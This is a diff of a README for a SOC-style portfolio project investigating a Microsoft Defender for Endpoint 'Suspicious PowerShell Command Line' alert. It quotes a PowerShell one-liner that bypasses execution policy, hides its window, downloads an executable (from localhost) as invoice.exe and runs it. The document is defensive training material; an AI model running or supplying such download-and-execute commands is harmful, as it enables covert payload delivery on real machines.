Chrisrajasekar/Suspicious-PowerShell-Command-Line-Investigation/README.md

+# 🚨 Suspicious PowerShell Command Line Investigation (Microsoft Defender for Endpoint)

-🛡️ Project Overview
+## 🛡️📌 Project Overview

+This GitHub project documents a **realistic SOC-style incident investigation** based on a **Microsoft Defender for Endpoint alert** triggered by a **Suspicious PowerShell Command Line execution**.
 This project focuses on a Suspicious PowerShell Command Line alert.
 The scenario involves an attacker attempting to bypass execution policies and download a secondary payload (invoice.exe) while remaining hidden from the end-user.
 By documenting this incident, I showcase my ability to navigate the Defender for Endpoint portal, interpret the Attack Story, and perform critical remediation actions like device isolation and automated investigations.

-🕵️ The Incident: Suspicious PowerShell Execution
-Alert Trigger: Suspicious PowerShell Command Line The Malicious Command:

-PowerShell
-powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden -Command { $ErrorActionPreference = 'SilentlyContinue'; (New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-WDATP-test\invoice.exe'); Start-Process 'C:\test-WDATP-test\invoice.exe' }

-# 🚨 Suspicious PowerShell Command Line Investigation (Microsoft Defender for Endpoint)

-## 🛡️📌 Project Overview

-This GitHub project documents a **realistic SOC-style incident investigation** based on a **Microsoft Defender for Endpoint alert** triggered by a **Suspicious PowerShell Command Line execution**.

-The project demonstrates how a **Security Analyst** investigates, responds to, and remediates a potentially malicious PowerShell-based attack leveraging **execution policy bypass**, **hidden windows**, and **in-memory payload delivery** — a common attacker technique.

 This repository is designed for: